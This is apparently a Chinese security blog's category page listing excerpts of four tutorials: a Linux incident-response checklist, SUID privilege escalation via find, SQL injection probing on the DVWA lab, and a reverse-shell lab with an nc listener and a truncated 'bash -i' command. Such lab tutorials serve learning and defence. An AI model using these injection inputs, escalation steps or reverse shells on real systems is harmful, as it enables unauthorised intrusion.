随笔分类 - 网络安全
摘要:蓝队应急响应 Linux排查 目录 一、 Linux 敏感目录 tmp介绍 开机自启动目录介绍 基于时间和权限的筛选 二、 可疑网络连接分析 三、 进程所对文件分析 四、 登录分析 五、异常用户分析与排查 六、历史执行命令排查 七、计划任务排查 八、开机启动项排查 九、异常$PATH 环境变量排查
阅读全文
摘要:find 命令提权 普通用户find命令提权 先查看find命令有没有提权的可能 1. 查看find命令权限 方法 一、 # 1. 查看find命令位置 which find # 2. 查看 find 命令权限 ls -l /usr/bin/find # 这是find 默认位置 -rwsr-xr-x
阅读全文
摘要:来源 dvwa 平台 级别为Low 中的SQL Injection 试题 1. 判断注入点 # 网址?id=1 id=1\ id=1' # 页面如果报错多了一个单引号,那么说明可能存在注入点 ‘id=1 and 1=1’页面正常,‘id=1 and 1=2’时页面不正常,则这个页面边可能存在注入 i
阅读全文
摘要:实验环境: A : kali 虚拟机 B: centos7.5 虚拟机 1. A 机 kali 虚拟机 设置监听 端口 root@kali64:~# nc -lvvp 9001 # 端口随便定义,没被使用就行 2. B机 执行命令反弹shell [root@localhost ~]# bash -i
阅读全文
